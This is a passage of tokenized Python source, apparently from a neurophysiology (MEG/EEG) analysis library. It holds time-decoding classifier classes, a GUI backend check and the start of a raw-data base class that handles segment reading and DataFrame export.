append ( range ( start , start + length ) ) <EOL> window [ '<STR_LIT>' ] = time_slices <EOL> window [ '<STR_LIT>' ] = _set_window_time ( window [ '<STR_LIT>' ] , times ) <EOL> return window <EOL> def _set_window_time ( slices , times ) : <EOL> """<STR_LIT>""" <EOL> t_idx_ = [ t [ - <NUM_LIT:1> ] for t in slices ] <EOL> return times [ t_idx_ ] <EOL> def _predict ( X , estimators , vectorize_times , predict_method ) : <EOL> """<STR_LIT>""" <EOL> from scipy import stats <EOL> from sklearn . base import is_classifier <EOL> orig_shape = X . shape <EOL> n_epochs = orig_shape [ <NUM_LIT:0> ] <EOL> n_times = orig_shape [ - <NUM_LIT:1> ] <EOL> n_clf = len ( estimators ) <EOL> if vectorize_times : <EOL> X = np . hstack ( X ) . T <EOL> n_epochs_tmp = len ( X ) <EOL> for fold , clf in enumerate ( estimators ) : <EOL> _y_pred = getattr ( clf , predict_method ) ( X ) <EOL> if _y_pred . ndim == <NUM_LIT:1> : <EOL> _y_pred = _y_pred [ : , None ] <EOL> if fold == <NUM_LIT:0> : <EOL> predict_size = _y_pred . shape [ <NUM_LIT:1> ] <EOL> y_pred = np . ones ( ( n_epochs_tmp , predict_size , n_clf ) ) <EOL> y_pred [ : , : , fold ] = _y_pred <EOL> if fold > <NUM_LIT:0> : <EOL> if is_classifier ( clf ) and ( predict_method == '<STR_LIT>' ) : <EOL> y_pred , _ = stats . mode ( y_pred , axis = <NUM_LIT:2> ) <EOL> else : <EOL> y_pred = np . mean ( y_pred , axis = <NUM_LIT:2> , keepdims = True ) <EOL> y_pred = y_pred [ : , : , <NUM_LIT:0> ] <EOL> if vectorize_times : <EOL> shape = [ n_epochs , n_times , y_pred . shape [ - <NUM_LIT:1> ] ] <EOL> y_pred = y_pred . reshape ( shape ) . 
transpose ( [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ] ) <EOL> return y_pred <EOL> class GeneralizationAcrossTime ( _GeneralizationAcrossTime ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , picks = None , cv = <NUM_LIT:5> , clf = None , train_times = None , <EOL> test_times = None , predict_method = '<STR_LIT>' , <EOL> predict_mode = '<STR_LIT>' , scorer = None , n_jobs = <NUM_LIT:1> ) : <EOL> super ( GeneralizationAcrossTime , self ) . __init__ ( <EOL> picks = picks , cv = cv , clf = clf , train_times = train_times , <EOL> test_times = test_times , predict_method = predict_method , <EOL> predict_mode = predict_mode , scorer = scorer , n_jobs = n_jobs ) <EOL> def __repr__ ( self ) : <EOL> s = '<STR_LIT>' <EOL> if hasattr ( self , "<STR_LIT>" ) : <EOL> s += "<STR_LIT>" % ( <EOL> self . train_times_ . get ( '<STR_LIT:start>' , np . nan ) , <EOL> self . train_times_ . get ( '<STR_LIT>' , np . nan ) ) <EOL> else : <EOL> s += '<STR_LIT>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> s += ( "<STR_LIT>" % len ( self . y_pred_ [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> s += "<STR_LIT>" <EOL> if hasattr ( self , "<STR_LIT>" ) and hasattr ( self , '<STR_LIT>' ) : <EOL> s += '<STR_LIT>' <EOL> else : <EOL> s += '<STR_LIT:U+002CU+0020>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> s += "<STR_LIT>" <EOL> if callable ( self . scorer_ ) : <EOL> s += "<STR_LIT>" % ( self . scorer_ . 
__name__ ) <EOL> else : <EOL> s += "<STR_LIT>" <EOL> return "<STR_LIT>" % s <EOL> def plot ( self , title = None , vmin = None , vmax = None , tlim = None , ax = None , <EOL> cmap = '<STR_LIT>' , show = True , colorbar = True , <EOL> xlabel = True , ylabel = True ) : <EOL> """<STR_LIT>""" <EOL> return plot_gat_matrix ( self , title = title , vmin = vmin , vmax = vmax , <EOL> tlim = tlim , ax = ax , cmap = cmap , show = show , <EOL> colorbar = colorbar , xlabel = xlabel , ylabel = ylabel ) <EOL> def plot_diagonal ( self , title = None , xmin = None , xmax = None , ymin = None , <EOL> ymax = None , ax = None , show = True , color = None , <EOL> xlabel = True , ylabel = True , legend = True , chance = True , <EOL> label = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return plot_gat_times ( self , train_time = '<STR_LIT>' , title = title , <EOL> xmin = xmin , xmax = xmax , <EOL> ymin = ymin , ymax = ymax , ax = ax , show = show , <EOL> color = color , xlabel = xlabel , ylabel = ylabel , <EOL> legend = legend , chance = chance , label = label ) <EOL> def plot_times ( self , train_time , title = None , xmin = None , xmax = None , <EOL> ymin = None , ymax = None , ax = None , show = True , color = None , <EOL> xlabel = True , ylabel = True , legend = True , chance = True , <EOL> label = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not np . array ( train_time ) . dtype is np . 
dtype ( '<STR_LIT:float>' ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % type ( train_time ) ) <EOL> return plot_gat_times ( self , train_time = train_time , title = title , <EOL> xmin = xmin , xmax = xmax , <EOL> ymin = ymin , ymax = ymax , ax = ax , show = show , <EOL> color = color , xlabel = xlabel , ylabel = ylabel , <EOL> legend = legend , chance = chance , label = label ) <EOL> class TimeDecoding ( _GeneralizationAcrossTime ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , picks = None , cv = <NUM_LIT:5> , clf = None , times = None , <EOL> predict_method = '<STR_LIT>' , predict_mode = '<STR_LIT>' , <EOL> scorer = None , n_jobs = <NUM_LIT:1> ) : <EOL> super ( TimeDecoding , self ) . __init__ ( picks = picks , cv = cv , clf = clf , <EOL> train_times = times , <EOL> test_times = '<STR_LIT>' , <EOL> predict_method = predict_method , <EOL> predict_mode = predict_mode , <EOL> scorer = scorer , n_jobs = n_jobs ) <EOL> self . _clean_times ( ) <EOL> def __repr__ ( self ) : <EOL> s = '<STR_LIT>' <EOL> if hasattr ( self , "<STR_LIT>" ) : <EOL> s += "<STR_LIT>" % ( <EOL> self . times_ . get ( '<STR_LIT:start>' , np . nan ) , <EOL> self . times_ . get ( '<STR_LIT>' , np . nan ) ) <EOL> else : <EOL> s += '<STR_LIT>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> s += ( "<STR_LIT>" % len ( self . y_pred_ [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> s += "<STR_LIT>" <EOL> if hasattr ( self , "<STR_LIT>" ) and hasattr ( self , '<STR_LIT>' ) : <EOL> s += '<STR_LIT>' <EOL> else : <EOL> s += '<STR_LIT:U+002CU+0020>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> s += "<STR_LIT>" <EOL> if callable ( self . scorer_ ) : <EOL> s += "<STR_LIT>" % ( self . scorer_ . __name__ ) <EOL> else : <EOL> s += "<STR_LIT>" <EOL> return "<STR_LIT>" % s <EOL> def fit ( self , epochs , y = None ) : <EOL> """<STR_LIT>""" <EOL> self . _prep_times ( ) <EOL> super ( TimeDecoding , self ) . fit ( epochs , y = y ) <EOL> self . 
_clean_times ( ) <EOL> return self <EOL> def predict ( self , epochs ) : <EOL> """<STR_LIT>""" <EOL> self . _prep_times ( ) <EOL> super ( TimeDecoding , self ) . predict ( epochs ) <EOL> self . _clean_times ( ) <EOL> return self . y_pred_ <EOL> def score ( self , epochs = None , y = None ) : <EOL> """<STR_LIT>""" <EOL> if epochs is not None : <EOL> self . predict ( epochs ) <EOL> else : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _prep_times ( ) <EOL> super ( TimeDecoding , self ) . score ( epochs = None , y = y ) <EOL> self . _clean_times ( ) <EOL> return self . scores_ <EOL> def plot ( self , title = None , xmin = None , xmax = None , ymin = None , ymax = None , <EOL> ax = None , show = True , color = None , xlabel = True , ylabel = True , <EOL> legend = True , chance = True , label = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . _prep_times ( ) <EOL> fig = plot_gat_times ( self , train_time = '<STR_LIT>' , title = title , <EOL> xmin = xmin , xmax = xmax , ymin = ymin , ymax = ymax , ax = ax , <EOL> show = show , color = color , xlabel = xlabel , <EOL> ylabel = ylabel , legend = legend , chance = chance , <EOL> label = label ) <EOL> self . _clean_times ( ) <EOL> return fig <EOL> def _prep_times ( self ) : <EOL> """<STR_LIT>""" <EOL> self . test_times = '<STR_LIT>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . train_times = self . times <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . train_times_ = self . times_ <EOL> self . test_times_ = _DecodingTime ( ) <EOL> self . test_times_ [ '<STR_LIT>' ] = [ [ slic ] for slic in <EOL> self . train_times_ [ '<STR_LIT>' ] ] <EOL> self . test_times_ [ '<STR_LIT>' ] = [ [ tim ] for tim in <EOL> self . train_times_ [ '<STR_LIT>' ] ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . scores_ = [ [ score ] for score in self . scores_ ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . 
y_pred_ = [ [ y_pred ] for y_pred in self . y_pred_ ] <EOL> def _clean_times ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . times = self . train_times <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . times_ = self . train_times_ <EOL> for attr in [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , attr ) : <EOL> delattr ( self , attr ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . y_pred_ = [ y_pred [ <NUM_LIT:0> ] for y_pred in self . y_pred_ ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . scores_ = [ score [ <NUM_LIT:0> ] for score in self . scores_ ] <EOL> def _chunk_data ( X , slices ) : <EOL> """<STR_LIT>""" <EOL> slices = [ sl for sl in slices if len ( sl ) ] <EOL> selected_times = np . hstack ( [ np . ravel ( sl ) for sl in slices ] ) <EOL> start = np . min ( selected_times ) <EOL> stop = np . max ( selected_times ) + <NUM_LIT:1> <EOL> slices_chunk = [ sl - start for sl in slices ] <EOL> X_chunk = X [ : , : , start : stop ] <EOL> return X_chunk , slices_chunk <EOL> def _set_cv ( cv , clf = None , X = None , y = None ) : <EOL> from sklearn . base import is_classifier <EOL> if check_version ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> from sklearn . model_selection import ( check_cv , StratifiedKFold , KFold ) <EOL> if isinstance ( cv , ( int , np . int ) ) : <EOL> XFold = StratifiedKFold if is_classifier ( clf ) else KFold <EOL> cv = XFold ( n_folds = cv ) <EOL> cv = check_cv ( cv = cv , y = y , classifier = is_classifier ( clf ) ) <EOL> else : <EOL> from sklearn . cross_validation import ( check_cv , StratifiedKFold , KFold ) <EOL> if isinstance ( cv , ( int , np . 
int ) ) : <EOL> if is_classifier ( clf ) : <EOL> cv = StratifiedKFold ( y = y , n_folds = cv ) <EOL> else : <EOL> cv = KFold ( n = len ( y ) , n_folds = cv ) <EOL> cv = check_cv ( cv = cv , X = X , y = y , classifier = is_classifier ( clf ) ) <EOL> if hasattr ( cv , '<STR_LIT>' ) : <EOL> cv_splits = [ ( train , test ) for train , test in <EOL> cv . split ( X = np . zeros_like ( y ) , y = y ) ] <EOL> else : <EOL> cv_splits = [ ( train , test ) for train , test in cv ] <EOL> if not np . all ( [ len ( train ) for train , _ in cv_splits ] ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return cv , cv_splits </s>
<s> """<STR_LIT>""" <EOL> def _check_backend ( ) : <EOL> from . . utils import _check_pyface_backend <EOL> try : <EOL> from pyface . api import warning <EOL> except ImportError : <EOL> warning = None <EOL> backend , status = _check_pyface_backend ( ) <EOL> if status == <NUM_LIT:0> : <EOL> return <EOL> elif status == <NUM_LIT:1> : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % backend ) <EOL> elif status == <NUM_LIT:2> : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % backend ) <EOL> warning ( None , msg , "<STR_LIT>" ) </s>
<s> import copy <EOL> from copy import deepcopy <EOL> import os <EOL> import os . path as op <EOL> import numpy as np <EOL> from scipy import linalg <EOL> from . constants import FIFF <EOL> from . pick import pick_types , channel_type , pick_channels , pick_info <EOL> from . pick import _pick_data_channels , _pick_data_or_ica <EOL> from . meas_info import write_meas_info <EOL> from . proj import setup_proj , activate_proj , _proj_equal , ProjMixin <EOL> from . . channels . channels import ( ContainsMixin , UpdateChannelsMixin , <EOL> SetChannelsMixin , InterpolationMixin ) <EOL> from . . channels . montage import read_montage , _set_montage , Montage <EOL> from . compensator import set_current_comp <EOL> from . write import ( start_file , end_file , start_block , end_block , <EOL> write_dau_pack16 , write_float , write_double , <EOL> write_complex64 , write_complex128 , write_int , <EOL> write_id , write_string , write_name_list , _get_split_size ) <EOL> from . . filter import ( low_pass_filter , high_pass_filter , band_pass_filter , <EOL> notch_filter , band_stop_filter , resample , <EOL> _resample_stim_channels ) <EOL> from . . fixes import in1d <EOL> from . . parallel import parallel_func <EOL> from . . utils import ( _check_fname , _check_pandas_installed , <EOL> _check_pandas_index_arguments , _check_copy_dep , <EOL> check_fname , _get_stim_channel , object_hash , <EOL> logger , verbose , _time_mask , warn , deprecated ) <EOL> from . . viz import plot_raw , plot_raw_psd , plot_raw_psd_topo <EOL> from . . defaults import _handle_default <EOL> from . . externals . six import string_types <EOL> from . . event import find_events , concatenate_events <EOL> from . . annotations import _combine_annotations , _onset_to_seconds <EOL> class ToDataFrameMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def _get_check_picks ( self , picks , picks_check ) : <EOL> if picks is None : <EOL> picks = list ( range ( self . 
info [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> if not in1d ( picks , np . arange ( len ( picks_check ) ) ) . all ( ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return picks <EOL> def to_data_frame ( self , picks = None , index = None , scale_time = <NUM_LIT> , <EOL> scalings = None , copy = True , start = None , stop = None ) : <EOL> """<STR_LIT>""" <EOL> from . . epochs import _BaseEpochs <EOL> from . . evoked import Evoked <EOL> from . . source_estimate import _BaseSourceEstimate <EOL> pd = _check_pandas_installed ( ) <EOL> mindex = list ( ) <EOL> if isinstance ( self , _BaseSourceEstimate ) : <EOL> if self . subject is None : <EOL> default_index = [ '<STR_LIT:time>' ] <EOL> else : <EOL> default_index = [ '<STR_LIT>' , '<STR_LIT:time>' ] <EOL> data = self . data . T <EOL> times = self . times <EOL> shape = data . shape <EOL> mindex . append ( ( '<STR_LIT>' , np . repeat ( self . subject , shape [ <NUM_LIT:0> ] ) ) ) <EOL> if isinstance ( self . vertices , list ) : <EOL> col_names = [ i for e in [ <EOL> [ '<STR_LIT>' . format ( '<STR_LIT>' if ii < <NUM_LIT:1> else '<STR_LIT>' , vert ) <EOL> for vert in vertno ] <EOL> for ii , vertno in enumerate ( self . vertices ) ] <EOL> for i in e ] <EOL> else : <EOL> col_names = [ '<STR_LIT>' . format ( vert ) for vert in self . vertices ] <EOL> elif isinstance ( self , ( _BaseEpochs , _BaseRaw , Evoked ) ) : <EOL> picks = self . _get_check_picks ( picks , self . ch_names ) <EOL> if isinstance ( self , _BaseEpochs ) : <EOL> default_index = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' ] <EOL> data = self . get_data ( ) [ : , picks , : ] <EOL> times = self . times <EOL> n_epochs , n_picks , n_times = data . shape <EOL> data = np . hstack ( data ) . T <EOL> times = np . tile ( times , n_epochs ) <EOL> id_swapped = dict ( ( v , k ) for k , v in self . event_id . items ( ) ) <EOL> names = [ id_swapped [ k ] for k in self . events [ : , <NUM_LIT:2> ] ] <EOL> mindex . append ( ( '<STR_LIT>' , np . 
repeat ( names , n_times ) ) ) <EOL> mindex . append ( ( '<STR_LIT>' , <EOL> np . repeat ( np . arange ( n_epochs ) , n_times ) ) ) <EOL> col_names = [ self . ch_names [ k ] for k in picks ] <EOL> elif isinstance ( self , ( _BaseRaw , Evoked ) ) : <EOL> default_index = [ '<STR_LIT:time>' ] <EOL> if isinstance ( self , _BaseRaw ) : <EOL> data , times = self [ picks , start : stop ] <EOL> elif isinstance ( self , Evoked ) : <EOL> data = self . data [ picks , : ] <EOL> times = self . times <EOL> n_picks , n_times = data . shape <EOL> data = data . T <EOL> col_names = [ self . ch_names [ k ] for k in picks ] <EOL> types = [ channel_type ( self . info , idx ) for idx in picks ] <EOL> n_channel_types = <NUM_LIT:0> <EOL> ch_types_used = [ ] <EOL> scalings = _handle_default ( '<STR_LIT>' , scalings ) <EOL> for t in scalings . keys ( ) : <EOL> if t in types : <EOL> n_channel_types += <NUM_LIT:1> <EOL> ch_types_used . append ( t ) <EOL> for t in ch_types_used : <EOL> scaling = scalings [ t ] <EOL> idx = [ picks [ i ] for i in range ( len ( picks ) ) if types [ i ] == t ] <EOL> if len ( idx ) > <NUM_LIT:0> : <EOL> data [ : , idx ] *= scaling <EOL> else : <EOL> raise NameError ( '<STR_LIT>' + <EOL> '<STR_LIT>' . format ( type ( self ) ) ) <EOL> times = np . round ( times * scale_time ) <EOL> mindex . append ( ( '<STR_LIT:time>' , times ) ) <EOL> if index is not None : <EOL> _check_pandas_index_arguments ( index , default_index ) <EOL> else : <EOL> index = default_index <EOL> if copy is True : <EOL> data = data . copy ( ) <EOL> assert all ( len ( mdx ) == len ( mindex [ <NUM_LIT:0> ] ) for mdx in mindex ) <EOL> df = pd . DataFrame ( data , columns = col_names ) <EOL> for i , ( k , v ) in enumerate ( mindex ) : <EOL> df . insert ( i , k , v ) <EOL> if index is not None : <EOL> if '<STR_LIT:time>' in index : <EOL> logger . info ( '<STR_LIT>' ) <EOL> df [ '<STR_LIT:time>' ] = df [ '<STR_LIT:time>' ] . astype ( np . int64 ) <EOL> df . 
set_index ( index , inplace = True ) <EOL> if all ( i in default_index for i in index ) : <EOL> df . columns . name = '<STR_LIT>' <EOL> return df <EOL> class TimeMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def time_as_index ( self , times , use_rounding = False ) : <EOL> """<STR_LIT>""" <EOL> from . . source_estimate import _BaseSourceEstimate <EOL> if isinstance ( self , _BaseSourceEstimate ) : <EOL> sfreq = <NUM_LIT:1.> / self . tstep <EOL> else : <EOL> sfreq = self . info [ '<STR_LIT>' ] <EOL> index = ( np . atleast_1d ( times ) - self . times [ <NUM_LIT:0> ] ) * sfreq <EOL> if use_rounding : <EOL> index = np . round ( index ) <EOL> return index . astype ( int ) <EOL> def _check_fun ( fun , d , * args , ** kwargs ) : <EOL> want_shape = d . shape <EOL> d = fun ( d , * args , ** kwargs ) <EOL> if not isinstance ( d , np . ndarray ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if d . shape != want_shape : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( want_shape , d . shape ) ) <EOL> return d <EOL> class _BaseRaw ( ProjMixin , ContainsMixin , UpdateChannelsMixin , <EOL> SetChannelsMixin , InterpolationMixin , ToDataFrameMixin , <EOL> TimeMixin ) : <EOL> """<STR_LIT>""" <EOL> @ verbose <EOL> def __init__ ( self , info , preload = False , <EOL> first_samps = ( <NUM_LIT:0> , ) , last_samps = None , <EOL> filenames = ( None , ) , raw_extras = ( None , ) , <EOL> comp = None , orig_comp_grade = None , orig_format = '<STR_LIT>' , <EOL> dtype = np . float64 , verbose = None ) : <EOL> if isinstance ( preload , np . ndarray ) : <EOL> if preload . dtype not in ( np . float64 , np . complex128 ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % preload . dtype ) <EOL> if preload . dtype != dtype : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _data = preload <EOL> self . preload = True <EOL> assert len ( first_samps ) == <NUM_LIT:1> <EOL> last_samps = [ first_samps [ <NUM_LIT:0> ] + self . _data . 
shape [ <NUM_LIT:1> ] - <NUM_LIT:1> ] <EOL> load_from_disk = False <EOL> else : <EOL> if last_samps is None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if preload is False : <EOL> self . preload = False <EOL> load_from_disk = False <EOL> elif preload is not True and not isinstance ( preload , string_types ) : <EOL> raise ValueError ( '<STR_LIT>' % preload ) <EOL> else : <EOL> load_from_disk = True <EOL> self . _last_samps = np . array ( last_samps ) <EOL> self . _first_samps = np . array ( first_samps ) <EOL> info . _check_consistency ( ) <EOL> self . info = info <EOL> if info . get ( '<STR_LIT>' , None ) is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> cals = np . empty ( info [ '<STR_LIT>' ] ) <EOL> for k in range ( info [ '<STR_LIT>' ] ) : <EOL> cals [ k ] = info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] * info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] <EOL> self . verbose = verbose <EOL> self . _cals = cals <EOL> self . _raw_extras = list ( raw_extras ) <EOL> self . comp = comp <EOL> self . _orig_comp_grade = orig_comp_grade <EOL> self . _filenames = list ( filenames ) <EOL> self . orig_format = orig_format <EOL> self . _projectors = list ( ) <EOL> self . _projector = None <EOL> self . _dtype_ = dtype <EOL> self . annotations = None <EOL> self . _update_times ( ) <EOL> if load_from_disk : <EOL> self . _preload_data ( preload ) <EOL> @ property <EOL> def _dtype ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _dtype_ <EOL> def _read_segment ( self , start = <NUM_LIT:0> , stop = None , sel = None , data_buffer = None , <EOL> projector = None , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> start = int ( start ) <EOL> stop = self . n_times if stop is None else min ( [ int ( stop ) , self . n_times ] ) <EOL> if start >= stop : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> n_sel_channels = self . info [ '<STR_LIT>' ] if sel is None else len ( sel ) <EOL> if sel is not None and len ( sel ) > <NUM_LIT:1> and np . all ( np . 
diff ( sel ) == <NUM_LIT:1> ) : <EOL> sel = slice ( sel [ <NUM_LIT:0> ] , sel [ - <NUM_LIT:1> ] + <NUM_LIT:1> ) <EOL> idx = slice ( None , None , None ) if sel is None else sel <EOL> data_shape = ( n_sel_channels , stop - start ) <EOL> dtype = self . _dtype <EOL> if isinstance ( data_buffer , np . ndarray ) : <EOL> if data_buffer . shape != data_shape : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( data_buffer . shape , data_shape ) ) <EOL> data = data_buffer <EOL> elif isinstance ( data_buffer , string_types ) : <EOL> data = np . memmap ( data_buffer , mode = '<STR_LIT>' , <EOL> dtype = dtype , shape = data_shape ) <EOL> else : <EOL> data = np . zeros ( data_shape , dtype = dtype ) <EOL> cumul_lens = np . concatenate ( ( [ <NUM_LIT:0> ] , np . array ( self . _raw_lengths , <EOL> dtype = '<STR_LIT:int>' ) ) ) <EOL> cumul_lens = np . cumsum ( cumul_lens ) <EOL> files_used = np . logical_and ( np . less ( start , cumul_lens [ <NUM_LIT:1> : ] ) , <EOL> np . greater_equal ( stop - <NUM_LIT:1> , <EOL> cumul_lens [ : - <NUM_LIT:1> ] ) ) <EOL> cals = self . _cals . ravel ( ) [ np . newaxis , : ] <EOL> if self . comp is not None : <EOL> if projector is not None : <EOL> mult = self . comp * cals <EOL> mult = np . dot ( projector [ idx ] , mult ) <EOL> else : <EOL> mult = self . comp [ idx ] * cals <EOL> elif projector is not None : <EOL> mult = projector [ idx ] * cals <EOL> else : <EOL> mult = None <EOL> cals = cals . T [ idx ] <EOL> offset = <NUM_LIT:0> <EOL> for fi in np . nonzero ( files_used ) [ <NUM_LIT:0> ] : <EOL> start_file = self . _first_samps [ fi ] <EOL> if offset == <NUM_LIT:0> : <EOL> start_file += start - cumul_lens [ fi ] <EOL> stop_file = np . min ( [ stop - cumul_lens [ fi ] + self . _first_samps [ fi ] , <EOL> self . _last_samps [ fi ] + <NUM_LIT:1> ] ) <EOL> if start_file < self . 
_first_samps [ fi ] or stop_file < start_file : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> n_read = stop_file - start_file <EOL> this_sl = slice ( offset , offset + n_read ) <EOL> self . _read_segment_file ( data [ : , this_sl ] , idx , fi , <EOL> int ( start_file ) , int ( stop_file ) , <EOL> cals , mult ) <EOL> offset += n_read <EOL> return data <EOL> def _read_segment_file ( self , data , idx , fi , start , stop , cals , mult ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def _check_bad_segment ( self , start , stop , picks , <EOL> reject_by_annotation = False ) : <EOL> """<STR_LIT>""" <EOL> if start < <NUM_LIT:0> : <EOL> return None <EOL> if reject_by_annotation and self . annotations is not None : <EOL> annot = self . annotations <EOL> sfreq = self . info [ '<STR_LIT>' ] <EOL> onset = _onset_to_seconds ( self , annot . onset ) <EOL> overlaps = np . where ( onset < stop / sfreq ) <EOL> overlaps = np . where ( onset [ overlaps ] + annot . duration [ overlaps ] > <EOL> start / sfreq ) <EOL> for descr in annot . description [ overlaps ] : <EOL> if descr . lower ( ) . startswith ( '<STR_LIT>' ) : <EOL> return descr <EOL> return self [ picks , start : stop ] [ <NUM_LIT:0> ] <EOL> @ verbose <EOL> def load_data ( self , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . preload : <EOL> self . _preload_data ( True ) <EOL> return self <EOL> @ verbose <EOL> def _preload_data ( self , preload , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> data_buffer = preload if isinstance ( preload , ( string_types , <EOL> np . ndarray ) ) else None <EOL> logger . info ( '<STR_LIT>' % <EOL> ( <NUM_LIT:0> , len ( self . times ) - <NUM_LIT:1> , <NUM_LIT:0.> , self . times [ - <NUM_LIT:1> ] ) ) <EOL> self . _data = self . _read_segment ( data_buffer = data_buffer ) <EOL> assert len ( self . _data ) == self . info [ '<STR_LIT>' ] <EOL> self . preload = True <EOL> self . close ( ) <EOL> def _update_times ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
_times = np . arange ( self . n_times ) / float ( self . info [ '<STR_LIT>' ] ) <EOL> self . _times . flags . writeable = False <EOL> @ property <EOL> def first_samp ( self ) : <EOL> return self . _first_samps [ <NUM_LIT:0> ] <EOL> @ property <EOL> def last_samp ( self ) : <EOL> return self . first_samp + sum ( self . _raw_lengths ) - <NUM_LIT:1> <EOL> @ property <EOL> def _raw_lengths ( self ) : <EOL> return [ l - f + <NUM_LIT:1> for f , l in zip ( self . _first_samps , self . _last_samps ) ] <EOL> def __del__ ( self ) : <EOL> if hasattr ( self , '<STR_LIT>' ) and hasattr ( self . _data , '<STR_LIT:filename>' ) : <EOL> filename = self . _data . filename <EOL> del self . _data <EOL> try : <EOL> os . remove ( filename ) <EOL> except OSError : <EOL> pass <EOL> def __enter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self <EOL> def __exit__ ( self , exception_type , exception_val , trace ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . close ( ) <EOL> except : <EOL> return exception_type , exception_val , trace <EOL> def __hash__ ( self ) : <EOL> if not self . preload : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return object_hash ( dict ( info = self . info , data = self . _data ) ) <EOL> def _parse_get_set_params ( self , item ) : <EOL> if not isinstance ( item , tuple ) : <EOL> item = ( item , slice ( None , None , None ) ) <EOL> if len ( item ) != <NUM_LIT:2> : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if isinstance ( item [ <NUM_LIT:0> ] , slice ) : <EOL> start = item [ <NUM_LIT:0> ] . start if item [ <NUM_LIT:0> ] . start is not None else <NUM_LIT:0> <EOL> nchan = self . info [ '<STR_LIT>' ] <EOL> if start < <NUM_LIT:0> : <EOL> start += nchan <EOL> if start < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' % nchan ) <EOL> stop = item [ <NUM_LIT:0> ] . stop if item [ <NUM_LIT:0> ] . stop is not None else nchan <EOL> step = item [ <NUM_LIT:0> ] . step if item [ <NUM_LIT:0> ] . 
step is not None else <NUM_LIT:1> <EOL> sel = list ( range ( start , stop , step ) ) <EOL> else : <EOL> sel = item [ <NUM_LIT:0> ] <EOL> if isinstance ( item [ <NUM_LIT:1> ] , slice ) : <EOL> time_slice = item [ <NUM_LIT:1> ] <EOL> start , stop , step = ( time_slice . start , time_slice . stop , <EOL> time_slice . step ) <EOL> else : <EOL> item1 = item [ <NUM_LIT:1> ] <EOL> if np . array ( item [ <NUM_LIT:1> ] ) . dtype . kind == '<STR_LIT:i>' : <EOL> item1 = int ( item1 ) <EOL> if isinstance ( item1 , ( int , np . integer ) ) : <EOL> start , stop , step = item1 , item1 + <NUM_LIT:1> , <NUM_LIT:1> <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> if ( step is not None ) and ( step is not <NUM_LIT:1> ) : <EOL> raise ValueError ( '<STR_LIT>' % step ) <EOL> if isinstance ( sel , ( int , np . integer ) ) : <EOL> sel = np . array ( [ sel ] ) <EOL> if sel is not None and len ( sel ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return sel , start , stop <EOL> def __getitem__ ( self , item ) : <EOL> """<STR_LIT>""" <EOL> sel , start , stop = self . _parse_get_set_params ( item ) <EOL> if self . preload : <EOL> data = self . _data [ sel , start : stop ] <EOL> else : <EOL> data = self . _read_segment ( start = start , stop = stop , sel = sel , <EOL> projector = self . _projector , <EOL> verbose = self . verbose ) <EOL> times = self . times [ start : stop ] <EOL> return data , times 